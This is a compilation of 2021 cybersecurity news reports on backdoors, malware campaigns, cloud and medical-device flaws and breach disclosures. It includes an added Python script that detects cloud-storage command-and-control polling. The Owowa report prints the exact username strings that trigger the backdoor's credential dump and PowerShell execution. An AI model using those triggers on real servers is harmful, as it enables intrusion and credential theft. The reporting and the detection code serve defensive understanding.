Hackers Using Malicious IIS Server Module to Steal Microsoft Exchange Credentials
17.12.2021 Hacking Thehackernews
Malicious actors are deploying a previously undiscovered binary, an Internet Information Services (IIS) webserver module dubbed "Owowa," on Microsoft Exchange Outlook Web Access servers with the goal of stealing credentials and enabling remote command execution.
"Owowa is a C#-developed .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange's Outlook Web Access (OWA)," Kaspersky researchers Paul Rascagneres and Pierre Delcher said. "When loaded this way, Owowa will steal credentials that are entered by any user in the OWA login page, and will allow a remote operator to run commands on the underlying server."
The idea that a rogue IIS module can be fashioned as a backdoor is not new. In August 2021, an exhaustive study of the IIS threat landscape by Slovak cybersecurity company ESET revealed as many as 14 malware families that were developed as native IIS modules in an attempt to intercept HTTP traffic and remotely commandeer the compromised computers.
As a persistent component on the compromised system, Owowa is engineered to capture the credentials of users who successfully authenticate on the OWA login page. Exploitation can then be achieved by sending "seemingly innocuous requests" to the exposed web services, entering specifically crafted commands in the username and password fields of the OWA login page of a compromised server.
Specifically, if the OWA username is "jFuLIXpzRdateYHoVwMlfc," Owowa responds with the encrypted credentials. If the username, on the other hand, is "dEUM3jZXaDiob8BrqSy2PQO1", the PowerShell command typed in the OWA password field is executed, and the results are sent back to the attacker.
The Russian security firm said it detected a cluster of targets with compromised servers located in Malaysia, Mongolia, Indonesia, and the Philippines that primarily belong to government organizations, with the exception of one server that's attached to a government-owned transportation company. That said, additional organizations in Europe are believed to have been victimized by the actor as well.
Although no links have been unearthed between the Owowa operators and other publicly documented hacking groups, a username "S3crt" (read "secret") that was found embedded in the source code of the identified samples has yielded additional malware executables that are likely the work of the same developer. Chief among them are a number of binaries designed to execute an embedded shellcode, load next-stage malware retrieved from a remote server, and trigger the execution of Cobalt Strike payloads.
Kaspersky's Global Research and Analysis Team (GReAT) also said it identified an account with the same username on Keybase, where the individual has shared offensive tools such as Cobalt Strike and Core Impact, in addition to demonstrating an interest in the latter on RAIDForums.
"IIS modules are not a common format for backdoors, especially when compared to typical web application threats like web shells and can therefore easily be missed during standard file monitoring efforts," Rascagneres and Delcher said. "The malicious module […] represents an effective option for attackers to gain a strong foothold in targeted networks by persisting inside an Exchange server."
Karakurt: A New Emerging Data Theft and Cyber Extortion Hacking Group
17.12.2021 Hacking Thehackernews
A previously undocumented, financially motivated threat group has been connected to a string of data theft and extortion attacks on over 40 entities between September and November 2021.
The hacker collective, which goes by the self-proclaimed name Karakurt and was first identified in June 2021, is capable of modifying its tactics and techniques to adapt to the targeted environment, Accenture's Cyber Investigations, Forensics and Response (CIFR) team said in a report published on December 10.
"The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big game hunting approach," the CIFR team said. "Based on intrusion analysis to date, the threat group focuses solely on data exfiltration and subsequent extortion, rather than the more destructive ransomware deployment."
95% of the known victims are based in North America, while the remaining 5% are in Europe. Professional services, healthcare, industrial, retail, technology, and entertainment verticals have been the most targeted.
The goal, the researchers noted, is to avoid drawing attention to its malicious activities as much as possible by relying on living off the land (LotL) techniques, wherein the attackers abuse legitimate software and functions available in a system such as operating system components or installed software to move laterally and exfiltrate data, as opposed to deploying post-exploitation tools like Cobalt Strike.
With ransomware attacks gaining worldwide attention in the wake of incidents aimed at Colonial Pipeline, JBS, and Kaseya as well as the subsequent law enforcement actions that have caused actors like DarkSide, BlackMatter, and REvil to shutter their operations, Karakurt appears to be trying a different tack.
Rather than deploy ransomware after gaining initial access to victims' internet-facing systems via legitimate VPN credentials, the actor focuses almost exclusively on data exfiltration and extortion, a move that's less likely to bring the targets' business activities to a standstill and yet enable Karakurt to demand a "ransom" in return for the stolen information.
Besides encrypting data at rest wherever applicable, organizations are advised to turn on multi-factor authentication (MFA) for accounts, disable RDP on external-facing devices, and update infrastructure to the latest versions to prevent adversaries from exploiting unpatched systems with publicly known vulnerabilities.
Ad-Blocking Chrome Extension Caught Injecting Ads in Google Search Pages
15.10.21 Hacking Thehackernews
A new deceptive ad injection campaign has been found leveraging an ad blocker extension for Google Chrome and Opera web browsers to sneakily insert ads and affiliate codes on websites, according to new research from cybersecurity firm Imperva.
The findings come following the discovery of rogue domains distributing an ad injection script in late August 2021 that the researchers connected to an add-on called AllBlock. The extension has since been pulled from both the Chrome Web Store and Opera add-ons marketplaces.
While AllBlock does function as an ad blocker, its JavaScript code is injected into every new tab opened in the browser. It works by identifying and sending all links in a web page — typically on search engine results pages — to a remote server, which responds with a list of websites to replace the genuine links with, leading to a scenario where upon clicking a link, the victim is redirected to a different page.
"When the user clicks on any modified links on the webpage, he will be redirected to an affiliate link," Imperva researchers Johann Sillam and Ron Masas said. "Via this affiliate fraud, the attacker earns money when specific actions like registration or sale of the product take place."
AllBlock is also characterized by a variety of techniques aimed at avoiding detection, including clearing the debug console every 100ms and excluding major search engines. Imperva said the AllBlock extension is likely part of a larger distribution campaign that may have utilized other browser extensions and delivery methods, with ties observed to a previous PBot campaign based on overlaps in domain names and IP addresses.
"Ad injection is an evolving threat that can impact almost any site. Attackers will use anything from browser extensions to malware and adware installed on visitors' devices, making most site owners ill-equipped to handle such attacks," Sillam and Masas said.
"When ad injection is used, the site performance and user experience is degraded, making websites slower and harder to use," the researchers added. "Other impacts of ad injection include loss of customer trust and loyalty, revenue loss from ad placements, blocked content and diminished conversion rates."
Iranian Hackers Abuse Dropbox in Cyberattacks Against Aerospace and Telecom Firms
9.10.21 Hacking Thehackernews
Details have emerged about a new cyber espionage campaign directed against the aerospace and telecommunications industries, primarily in the Middle East, with the goal of stealing sensitive information about critical assets, organizations' infrastructure, and technology while remaining in the dark and successfully evading security solutions.
Boston-based cybersecurity company Cybereason dubbed the attacks "Operation Ghostshell," pointing out the use of a previously undocumented and stealthy remote access trojan (RAT) called ShellClient that's deployed as the main spy tool of choice. The first sign of the attacks was observed in July 2021 against a handpicked set of victims, indicating a highly targeted approach.
"The ShellClient RAT has been under ongoing development since at least 2018, with several iterations that introduced new functionalities, while it evaded antivirus tools and managed to remain undetected and publicly unknown," researchers Tom Fakterman, Daniel Frank, Chen Erlich, and Assaf Dahan said in a technical deep dive published today.
Cybereason traced the roots of this threat back to at least November 6, 2018, previously operating as a standalone reverse shell before evolving to a sophisticated backdoor, highlighting that the malware has been under continuous development with new features and capabilities added by its authors. What's more, the adversary behind the attacks is also said to have deployed an unknown executable named "lsa.exe" to perform credential dumping.
Investigation into the attribution of the cyber-attacks has also yielded an entirely new Iranian threat actor named MalKamak that has been operating since around the same time period and has eluded discovery and analysis thus far, with possible connections to other Iranian state-sponsored APT threat actors such as Chafer APT (aka APT39) and Agrius APT, the latter of which was found posing as ransomware operators in an effort to conceal the origin of a series of data-wiping hacks against Israeli entities.
Besides carrying out reconnaissance and the exfiltration of sensitive data, ShellClient is engineered as a modular portable executable that's capable of performing fingerprinting and registry operations. Also of note is the RAT's abuse of cloud storage services such as Dropbox for command-and-control (C2) communications in an attempt to stay under the radar by blending in with legitimate network traffic originating from the compromised systems.
The Dropbox storage contains three folders, each storing information about the infected machines, the commands to be executed by the ShellClient RAT, and the results of those commands. "Every two seconds, the victim machine checks the commands folder, retrieves files that represent commands, parses their content, then deletes them from the remote folder and enables them for execution," the researchers said.
The aforementioned modus operandi mirrors a tactic adopted by another threat actor called IndigoZebra, which was uncovered as relying on Dropbox API to store commands in a victim-specific sub-folder that's retrieved by the malware prior to execution.
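Both ShellClient and IndigoZebra, as described above, poll a cloud-storage folder for commands at a short fixed interval, and that cadence is what stands out in proxy telemetry even when the destination itself is a legitimate service. The following is an added example, not code from the article or from Cybereason's report: it groups outbound requests to a storage API by client host and flags clients whose request gaps are short and nearly constant, which is how a two-second command poll looks next to a person syncing files. The log lines, their simplified format, the client addresses and the thresholds are constructed for this example.

```python
"""Flag clients polling a cloud-storage API at a fixed, machine-like interval.

Added example (not the article's or Cybereason's code). Log format, hosts,
addresses and thresholds are constructed for illustration:
    <ISO timestamp> <client ip> <method> <host><path> <status>
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def constructed_log():
    """Build a small constructed proxy log: one poller, one human, one bystander."""
    base = datetime(2021, 7, 12, 9, 0, 0)
    lines = []
    # 10.1.2.3 checks the commands folder every two seconds (the cadence the report describes).
    for i in range(12):
        t = base + timedelta(seconds=2 * i)
        lines.append(f"{t.isoformat()} 10.1.2.3 POST api.dropboxapi.com/2/files/list_folder 200")
    # 10.1.2.4 is a person syncing a few files at irregular times.
    for s in (3, 47, 130, 612, 640):
        t = base + timedelta(seconds=s)
        lines.append(f"{t.isoformat()} 10.1.2.4 POST api.dropboxapi.com/2/files/list_folder 200")
    # 10.1.2.5 is unrelated browsing and should never be considered.
    lines.append(f"{(base + timedelta(seconds=5)).isoformat()} 10.1.2.5 GET www.example.com/ 200")
    return lines


def find_fixed_interval_pollers(lines, host_suffix="dropboxapi.com",
                                min_requests=8, max_cv=0.25, max_mean_interval=10.0):
    """Return clients whose requests to *host_suffix* arrive at a short, regular cadence.

    min_requests      - ignore clients seen fewer times than this
    max_cv            - coefficient of variation (stdev/mean) of the gaps; low = regular
    max_mean_interval - only short cadences (seconds) are of interest here
    """
    per_client = defaultdict(list)
    for line in lines:
        ts, client, _method, target, _status = line.split()
        host = target.split("/", 1)[0]
        if host.endswith(host_suffix):
            per_client[(client, host)].append(datetime.fromisoformat(ts))

    findings = []
    for (client, host), times in per_client.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg == 0:
            continue  # duplicate timestamps; nothing to measure
        cv = pstdev(gaps) / avg
        if cv <= max_cv and avg <= max_mean_interval:
            findings.append({
                "client": client,
                "host": host,
                "requests": len(times),
                "mean_interval_s": round(avg, 2),
                "cv": round(cv, 3),
            })
    return findings


if __name__ == "__main__":
    for f in find_fixed_interval_pollers(constructed_log()):
        print(f"{f['client']} -> {f['host']}: {f['requests']} requests, "
              f"mean gap {f['mean_interval_s']}s, cv {f['cv']}")
```

Real implants add jitter, so the coefficient-of-variation threshold is the knob to tune against your own baseline of legitimate sync clients; a client that trips this check is a lead for host triage, not a verdict on its own.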
The findings also arrive days after a new advanced persistent threat dubbed "ChamelGang" was identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks.
New Azure AD Bug Lets Hackers Brute-Force Passwords Without Getting Caught
6.10.21 Hacking Thehackernews
Cybersecurity researchers have disclosed an unpatched security vulnerability in the protocol used by Microsoft Azure Active Directory that potential adversaries could abuse to stage undetected brute-force attacks.
"This flaw allows threat actors to perform single-factor brute-force attacks against Azure Active Directory (Azure AD) without generating sign-in events in the targeted organization's tenant," researchers from Secureworks Counter Threat Unit (CTU) said in a report published on Wednesday.
Azure Active Directory is Microsoft's enterprise cloud-based identity and access management (IAM) solution designed for single sign-on (SSO) and multi-factor authentication. It's also a core component of Microsoft 365 (formerly Office 365), with capabilities to provide authentication to other applications via OAuth.
The weakness resides in the Seamless Single Sign-On feature that allows employees to automatically sign in when using their corporate devices that are connected to enterprise networks without having to enter any password. Seamless SSO is also an "opportunistic feature" in that if the process fails, the login falls back to the default behavior, wherein the user needs to enter their password on the sign-in page.
To achieve this, the mechanism relies on the Kerberos protocol to look up the corresponding user object in Azure AD and issue a ticket-granting ticket (TGT), permitting the user to access the resource in question. But for users of Exchange Online with Office clients older than the Office 2013 May 2015 update, authentication is carried out through a password-based endpoint called "UserNameMixed" that either generates an access token or an error code depending on whether the credentials are valid.
The flaw stems from these error codes. While successful authentication events create sign-in logs when access tokens are issued, "Autologon's authentication to Azure AD is not logged," an omission that can be leveraged for undetected brute-force attacks through the UserNameMixed endpoint.
Secureworks said it notified Microsoft of the issue on June 29, only for Microsoft to acknowledge the behavior on July 21 as "by design." When reached by The Hacker News, the company said "We've reviewed these claims and determined the technique described does not involve a security vulnerability and protections are in place to help ensure customers remain safe and secure."
Microsoft also clarified the safeguards against brute-force attacks already apply to the aforementioned endpoints, and that the tokens issued by the UserNameMixed API do not provide access to data, adding they need to be presented back to Azure AD to obtain the actual tokens. Such requests for access tokens are protected by Conditional Access, Azure AD Multi-Factor Authentication, Azure AD Identity Protection, and surfaced in sign-in logs, the company noted.
Hackers Targeting Brazil's PIX Payment System to Drain Users' Bank Accounts
6.10.21 Hacking Thehackernews
Two newly discovered malicious Android applications on Google Play Store have been used to target users of Brazil's instant payment ecosystem in a likely attempt to lure victims into fraudulently transferring their entire account balances into another bank account under cybercriminals' control.
"The attackers distributed two different variants of banking malware, named PixStealer and MalRhino, through two separate malicious applications […] to carry out their attacks," Check Point Research said in an analysis shared with The Hacker News. "Both malicious applications were designed to steal money of victims through user interaction and the original PIX application."
The two apps in question, which were uncovered in April 2021, have since been removed from the app store.
Launched in November 2020 by the Central Bank of Brazil, the country's monetary authority, Pix is a state-owned payments platform that enables consumers and companies to make money transfers from their bank accounts without requiring debit or credit cards.
PixStealer, which was found distributed on Google Play as a fake PagBank Cashback service app, is designed to empty a victim's funds into an actor-controlled account, while MalRhino — masquerading as a mobile token app for Brazil's Inter bank — comes with advanced features to collect the list of installed apps and retrieve PINs for specific banks.
"When a user opens their PIX bank application, Pixstealer shows the victim an overlay window, where the user can't see the attacker's moves," the researchers said. "Behind the overlay window, the attacker retrieves the available amount of money and transfers the money, often the entire account balance, to another account."
What unites PixStealer and MalRhino is that both apps abuse Android's accessibility service to perform malicious actions on the compromised devices, making them the latest addition to a long list of mobile malware that leverages the permission to perpetrate data theft.
Specifically, the fake overlay hijacks the entire screen to display the message "Synchronizing your access... Do not turn off your mobile screen" while, in the background, the malware searches for the "Transfer" button to perform the transaction with the help of accessibility APIs.
The MalRhino variant also stands out for its use of Mozilla's Java-based Rhino JS framework to run JavaScript commands inside targeted banking applications, but not before convincing the user to turn on accessibility services.
"This technique is not commonly used on mobile malware and shows how malicious actors are getting innovative to avoid detection and get inside Google Play," the researchers said. "With the increasing abuse of the Accessibility Service by mobile banking malware, users should be wary of enabling the relevant permissions even in the applications distributed via known app stores such as Google Play."
Linux Implementation of Cobalt Strike Beacon Targeting Organizations Worldwide
19.9.21 Hacking Thehackernews
Researchers on Monday took the wraps off a newly discovered Linux and Windows re-implementation of Cobalt Strike Beacon that's actively set its sights on government, telecommunications, information technology, and financial institutions in the wild.
The as-yet undetected version of the penetration testing tool — codenamed "Vermilion Strike" — marks one of the rare Linux ports of what has traditionally been a Windows-based red team tool heavily repurposed by adversaries to mount an array of targeted attacks. Cobalt Strike bills itself as "threat emulation software," with Beacon being the payload engineered to model an advanced actor and duplicate their post-exploitation actions.
"The stealthy sample uses Cobalt Strike's command-and-control (C2) protocol when communicating to the C2 server and has remote access capabilities such as uploading files, running shell commands and writing to files," Intezer researchers said in a report published today and shared with The Hacker News.
The Israeli cybersecurity company's findings come from an artifact uploaded to VirusTotal on August 10 from Malaysia. As of writing, only two anti-malware engines flag the file as malicious.
Once installed, the malware runs itself in the background and decrypts the configuration necessary for the beacon to function, before fingerprinting the compromised Linux machine and establishing communications with a remote server over DNS or HTTP to retrieve base64-encoded and AES-encrypted instructions that allow it to run arbitrary commands, write to files, and upload files back to the server.
Interestingly, additional samples identified during the course of the investigation have shed light on the Windows variant of the malware, sharing overlaps in the functionality and the C2 domains used to remotely commandeer the hosts. Intezer also called out the espionage campaign's limited scope, noting the malware's use in specific attacks as opposed to large-scale intrusions, while also attributing it to a "skilled threat actor" owing to the fact that Vermilion Strike has not been observed in other attacks to date.
This is far from the first time the legitimate security testing toolkit has been used to orchestrate attacks against a wide range of targets. Last month, U.S. security firm Secureworks detailed a spear-phishing campaign undertaken by a threat group tracked as Tin Woodlawn (aka APT32 or OceanLotus) that leveraged a customized and enhanced version of Cobalt Strike to evade security countermeasures in an attempt to steal intellectual property and trade secrets.
"Vermilion Strike and other Linux threats remain a constant threat. The predominance of Linux servers in the cloud and its continued rise invites APTs to modify their toolsets in order to navigate the existing environment," the researchers said.
Traffic Exchange Networks Distributing Malware Disguised as Cracked Software
10.9.21 Hacking Thehackernews
An ongoing campaign has been found to leverage a network of websites acting as a "dropper as a service" to deliver a bundle of malware payloads to victims looking for "cracked" versions of popular business and consumer applications.
"These malware included an assortment of click fraud bots, other information stealers, and even ransomware," researchers from cybersecurity firm Sophos said in a report published last week.
The attacks work by taking advantage of a number of bait pages hosted on WordPress that contain "download" links to software packages, which, when clicked, redirect the victims to a different website that delivers potentially unwanted browser plug-ins and malware, such as installers for Raccoon Stealer, Stop ransomware, the Glupteba backdoor, and a variety of malicious cryptocurrency miners that masquerade as antivirus solutions.
"Visitors who arrive on these sites are prompted to allow notifications; If they allow this to happen, the websites repeatedly issue false malware alerts," the researchers said. "If the users click the alerts, they're directed through a series of websites until they arrive at a destination that's determined by the visitor's operating system, browser type, and geographic location."
Using techniques like search engine optimization, links to the websites appear at the top of search results when individuals search for pirated versions of a wide range of software apps. The activities, considered to be the product of an underground marketplace for paid download services, allow entry-level cyber actors to set up and tailor their campaigns based on geographical targeting.
Traffic exchanges, as the distribution infrastructure is also called, typically require a Bitcoin payment before affiliates can create accounts on the service and begin distributing installers, with sites like InstallBest offering advice on "best practices," such as recommending against using Cloudflare-based hosts for downloaders, as well as using URLs within Discord's CDN, Bitbucket, or other cloud platforms.
On top of that, the researchers also found a number of services that, instead of offering their own malware delivery networks, act as "go-betweens" to established malvertising networks that pay website publishers for traffic. One such traffic supplier is InstallUSD, a Pakistan-based advertising network, which has been linked to a number of malware campaigns involving the cracked software sites.
This is far from the first time "warez" websites have been put to use as an infection vector by threat actors. Earlier this June, a cryptocurrency miner called Crackonosh was found abusing the method to install a coin miner package called XMRig for stealthily exploiting the infected host's resources to mine Monero.
A month later, the attackers behind a piece of malware dubbed MosaicLoader were found targeting individuals searching for cracked software as part of a global campaign to deploy a fully-featured backdoor capable of roping the compromised Windows systems into a botnet.
B.Braun Infusomat Pumps Could Let Attackers Remotely Alter Medication Dosages
25.8.21 Hacking Thehackernews
Cybersecurity researchers have disclosed five previously unreported security vulnerabilities affecting B. Braun's Infusomat Space Large Volume Pump and SpaceStation that could be abused by malicious parties to tamper with medication doses without any prior authentication.
McAfee, which discovered and reported the flaws to the German medical and pharmaceutical device company on January 11, 2021, said the "modification could appear as a device malfunction and be noticed only after a substantial amount of drug has been dispensed to a patient, since the infusion pump displays exactly what was prescribed, all while dispensing potentially lethal doses of medication."
The issues have been addressed by B. Braun in SpaceCom L82 or later, Battery Pack SP with WiFi:L82 or later, and DataModule compactplus version A12 or later.
Infusion pumps are medical devices used to deliver intravenous fluids, such as nutrients and medications, into a patient's body in controlled amounts, while SpaceStation is a configurable docking and communication system designed to accommodate up to four infusion pumps for use in a medical facility. The devices run on a software component called SpaceCom, an embedded Linux system that runs either on the pump from within its smart battery pack or from inside the SpaceStation.
In a nutshell, the flaws identified by McAfee enable an attacker to escalate privileges, view sensitive information, upload arbitrary files, and perform remote code execution:
CVE-2021-33885 – Insufficient Verification of Data Authenticity (CVSS 9.7)
CVE-2021-33882 – Missing Authentication for Critical Function (CVSS 8.2)
CVE-2021-33886 – Use of Externally-Controlled Format String (CVSS 7.7)
CVE-2021-33883 – Cleartext Transmission of Sensitive Information (CVSS 7.1)
CVE-2021-33884 – Unrestricted Upload of File with Dangerous Type (CVSS 5.8)
By chaining together the vulnerabilities, an adversary could "modify a pump's configuration while the pump is in standby mode, resulting in an unexpected dose of medication being delivered to a patient on its next use – all with zero authentication," McAfee's Advanced Threat Research team noted in a technical deep-dive.
Put differently, the weaknesses, which arise due to a lack of verification in the pump's operating system, could allow any attacker to send commands or data to it, thereby facilitating remote attacks that not only go undetected but also weaponize the device by altering the amount of medication a patient is expected to receive through infusion.
One caveat of note is that the attacks can only be successful when a pump is idle or in standby mode in between infusions, not to mention such unauthorized modifications to critical pump data necessitate that the threat actor first gain an initial foothold to the local network, or potentially carry out the intrusions over the internet in the event the pumps are directly exposed — a scenario that's unlikely.
"All facilities utilizing SpaceCom, Battery Pack SP with WiFi, and DataModule compactplus should review their IT infrastructure to ensure that a network zone concept has been implemented whereby critical systems, such as infusion pumps, are housed in separate (e.g., by firewalls or VLAN) environments which are not accessible directly from the internet or by unauthorized users," B. Braun said in an advisory published on May 14, 2021.
"Wireless networks should be implemented using multi-factor authentication and industry standard encryption and should be equipped with Intrusion Detection Systems (IDS) and/or Intrusion Prevention Systems (IPS)," the company added.
AP Sources: SolarWinds Hack Got Emails of Top DHS Officials
30.3.2021 Hacking Securityweek
Suspected Russian hackers gained access to email accounts belonging to the Trump administration’s head of the Department of Homeland Security and members of the department’s cybersecurity staff whose jobs included hunting threats from foreign countries, The Associated Press has learned.
The intelligence value of the hacking of then-acting Secretary Chad Wolf and his staff is not publicly known, but the symbolism is stark. Their accounts were accessed as part of what’s known as the SolarWinds intrusion and it throws into question how the U.S. government can protect individuals, companies and institutions across the country if it can’t protect itself.
The short answer for many security experts and federal officials is that it can’t — at least not without some significant changes.
“The SolarWinds hack was a victory for our foreign adversaries, and a failure for DHS,” said Sen. Rob Portman of Ohio, top Republican on the Senate’s Homeland Security and Governmental Affairs Committee. “We are talking about DHS’s crown jewels.”
The Biden administration has tried to keep a tight lid on the scope of the SolarWinds attack as it weighs retaliatory measures against Russia. But an inquiry by the AP found new details about the breach at DHS and other agencies, including the Energy Department, where hackers accessed top officials’ private schedules.
The AP interviewed more than a dozen current and former U.S. government officials, who spoke on the condition of anonymity because of the confidential nature of the ongoing investigation into the hack.
The vulnerabilities at Homeland Security in particular intensify the worries following the SolarWinds attack and an even more widespread hack affecting Microsoft Exchange’s email program, especially because in both cases the hackers were detected not by the government but by a private company.
In December, officials discovered what they describe as a sprawling, monthslong cyberespionage effort carried out largely through a hack of widely used software from Texas-based SolarWinds Inc. At least nine federal agencies were hacked, along with dozens of private-sector companies.
U.S. authorities have said the breach appeared to be the work of Russian hackers. Gen. Paul Nakasone, who leads the Pentagon’s cyber force, said last week the Biden administration is considering a “range of options” in response. Russia has denied any role in the hack.
Since then, a series of headline-grabbing hacks has further highlighted vulnerabilities in the U.S. public and private sectors. A hacker tried unsuccessfully to poison the water supply of a small town in Florida in February, and this month a new breach was announced involving untold thousands of Microsoft Exchange email servers the company says was carried out by Chinese state hackers. China has denied involvement in the Microsoft breach.
Sen. Mark Warner, a Virginia Democrat and head of the Senate Intelligence Committee, said the government’s initial response to the discovery of the SolarWinds hack was disjointed.
“What struck me was how much we were in the dark for as long as we were in the dark,” Warner said at a recent cybersecurity conference.
Wolf and other top Homeland Security officials used new phones that had been wiped clean along with the popular encrypted messaging system Signal to communicate in the days after the hack, current and former officials said.
One former administration official, who confirmed the Federal Aviation Administration was among the agencies affected by the breach, said the agency was hampered in its response by outdated technology and struggled for weeks to identify how many servers it had running SolarWinds software.
The FAA initially told the AP in mid-February that it had not been affected by the SolarWinds hack, only to issue a second statement a few days later that it was continuing to investigate.
At least one other Cabinet member besides Wolf was affected. The hackers were able to obtain the private schedules of officials at the Energy Department, including then-Secretary Dan Brouillette, one former high-placed administration official said.
The new disclosures provide a fuller picture of what kind of data was taken in the SolarWinds hack. Several congressional hearings have been held on the subject, but they have been notably short on details.
Rep. Pat Fallon, R-Texas, indicated at one of the hearings that a DHS secretary’s email had been hacked but did not provide additional detail. The AP was able to identify Wolf, who declined to comment other than to say he had multiple email accounts as secretary.
DHS spokeswoman Sarah Peck said “a small number of employees’ accounts were targeted in the breach” and the agency “no longer sees indicators of compromise on our networks.”
The Biden administration has pledged to issue an executive order soon to address “significant gaps in modernization and in technology of cybersecurity across the federal government.” But the list of obstacles facing the federal government is long: highly capable foreign hackers backed by governments that aren’t afraid of U.S. reprisals, outdated technology, a shortage of trained cybersecurity professionals, and a complex leadership and oversight structure.
The recently approved stimulus package includes $650 million in new money for the Cybersecurity and Infrastructure Security Agency to harden the country’s cyber defenses. Federal officials said that amount is only a down payment on much bigger planned spending to improve threat detection.
“We must raise our game,” Brandon Wales, who leads the cybersecurity agency, told a recent House committee hearing.
The agency operates a threat-detection system known as Einstein. Its failure to detect the SolarWinds breach before it was discovered by a private security company alarmed officials. Eric Goldstein, the agency’s executive assistant director for cybersecurity, told Congress that Einstein’s technology was designed a decade ago and has “grown somewhat stale.”
Anthony Ferrante, a former director for cyber incident response at the U.S. National Security Council and current senior managing director at FTI Consulting, said part of the problem, both in government and in the private sector, is the lack of a skilled workforce.
The Microsoft Exchange hack, which to date has not affected any federal government agencies, was also discovered by a private firm.
One issue that’s flummoxed policy makers is that foreign state hackers are increasingly using U.S.-based virtual private networks, or VPNs, to evade detection by U.S. intelligence agencies, which are legally constrained from monitoring domestic infrastructure. The hosting services of Amazon Web Services and GoDaddy were used by the SolarWinds hackers to evade detection, officials said recently.
The Biden administration is not planning to step up government surveillance of the U.S. internet in response and instead wants to focus on tighter partnerships and improved information-sharing with the private-sector companies that already have broad visibility into the domestic internet.
Responsibility for responding to breaches, preventing new ones and providing oversight of those efforts is still unsettled, and last month leaders of the Senate Intelligence Committee criticized the Biden administration for a “disorganized response” to the SolarWinds hack.
The Biden administration tapped Anne Neuberger, the deputy national security adviser for cyber and emergency technology, to respond to the SolarWinds and Microsoft breaches. It hasn’t appointed a national cyber director, a new position, frustrating some members of Congress.
“We’re trying to fight a multifront war without anybody in charge,” said Sen. Angus King, an independent from Maine.
The Biden administration says it’s reviewing how best to set up the new position. “Cybersecurity is a top priority,” said White House spokeswoman Emily Horne.
Energy giant Shell discloses data breach caused by Accellion FTA hack
24.3.2021 Hacking Securityaffairs
Oil and gas giant Royal Dutch Shell (Shell) discloses a data breach resulting from the compromise of its Accellion File Transfer Appliance (FTA) file sharing service.
Energy giant Shell disclosed a data breach resulting from the compromise of an Accellion File Transfer Appliance (FTA) used by the company.
Shell is an Anglo-Dutch multinational oil and gas company with more than 86,000 employees that made US$180.5 billion in 2020.
According to a data breach notification published by the company on its website, the cyber attack did not affect its network but only impacted an Accellion FTA server.
“Shell has been impacted by a data security incident involving Accellion’s File Transfer Appliance. Shell uses this appliance to securely transfer large data files.” reads the data breach notification.
“Upon learning of the incident, Shell addressed the vulnerabilities with its service provider and cyber security team, and started an investigation to better understand the nature and extent of the incident.”
Shell reported the security breach to data authorities and regulators, and impacted individuals and stakeholders.
“There is no evidence of any impact to Shell’s core IT systems as the file transfer service is isolated from the rest of Shell’s digital infrastructure. The ongoing investigation has shown that an unauthorized party gained access to various files during a limited window of time.”
Since the disclosure of the vulnerabilities in Accellion FTA, multiple cybercrime groups have targeted organizations worldwide. In February, security experts from FireEye linked a series of cyber attacks against organizations running Accellion File Transfer Appliance (FTA) servers to the cybercrime group UNC2546, aka FIN11.
Once they had compromised the victims’ networks, FIN11 hackers demanded a ransom in Bitcoin to avoid having the stolen information published on their leak site.
The researchers are tracking two separate clusters of activities. The first cluster tracked as UNC2546 is related to the exploitation of the zero-day flaws in Accellion FTA software and data exfiltration from targeted organizations running the legacy FTA products. The second cluster, tracked as UNC2582, is related to the subsequent extortion activity.
“We have identified overlaps between UNC2582, UNC2546, and prior FIN11 operations, and we will continue to evaluate the relationships between these clusters of activity.” continues FireEye.
FireEye pointed out that although FIN11 hackers are publishing data from Accellion FTA customers on the Clop ransomware leak site, they did not encrypt systems on the compromised networks.
In response to the wave of attacks, the vendor has released multiple security patches to address the vulnerabilities exploited by the hackers. The company is also going to retire legacy FTA server software by April 30, 2021.
Accellion is urging customers to update to the Kiteworks product, which replaces the FTA server.
Swiss expert Till Kottmann indicted for conspiracy, wire fraud, and aggravated identity theft
22.3.2021 Hacking Securityaffairs
The Department of Justice announced that Swiss hacker Till Kottmann, 21, has been indicted for conspiracy, wire fraud, and aggravated identity theft.
A group of US hackers recently claimed to have gained access to footage from 150,000 security cameras at banks, jails, schools, healthcare clinics, and prominent organizations.
Hackers also posted images captured from the hacked surveillance video on Twitter with an #OperationPanopticon hashtag; the published images show that they gained root shell access to the surveillance cameras used by Tesla and Cloudflare.
One of the members of the group, Tillie Kottmann (aka “deletescape” and “tillie crimew”), revealed that they gained access to these surveillance cameras using a super admin account for the surveillance company Verkada.
According to BleepingComputer, Kottmann reverse-engineered the firmware used by Verkada and discovered hardcoded credentials for a super admin account.
Once Verkada became aware of the hack, it disabled all internal administrator accounts to prevent any unauthorised access.
Tillie Kottmann is a popular hacker in the cybersecurity community; he was involved in numerous leaks of source code from dozens of large companies, including Intel, Lenovo, Motorola, Nintendo, Nissan, AMD, and Qualcomm.
The DoJ announced this week that Till Kottmann was indicted for computer intrusion and identity and data theft activities spanning 2019 to the present.
According to the US authorities, the activity of the hacker posed a serious threat to hundreds of organizations breached by the man and conspirators.
“A prolific Swiss computer hacker, TILL KOTTMANN, 21, was indicted today by a grand jury in the Western District of Washington for computer intrusion and identity and data theft activities spanning 2019 to the present.” reads the press release published by DoJ. “KOTTMANN, aka “deletescape” and “tillie crimew,” who initially was charged in September 2020, remains in Lucerne, Switzerland, and has received notice of pending U.S. charges.”
“Stealing credentials and data, and publishing source code and proprietary and sensitive information on the web is not protected speech–it is theft and fraud,” said Acting U.S. Attorney Tessa M. Gorman. “These actions can increase vulnerabilities for everyone from large corporations to individual consumers. Wrapping oneself in an allegedly altruistic motive does not remove the criminal stench from such intrusion, theft, and fraud.”
KOTTMANN focuses on targeting “git” and other source code repositories belonging to private companies and public sector entities. The hackers cloned the source code, files, and other confidential and proprietary information, searching for hard-coded administrative credentials and access keys. The hacker then used this data to further infiltrate the internal infrastructure of the targeted organization and access additional sensitive information and files.
The initial charges relate to earlier hacking activity, as they date from September 2020. Last Friday, Swiss authorities raided Kottmann’s home and seized electronic devices.
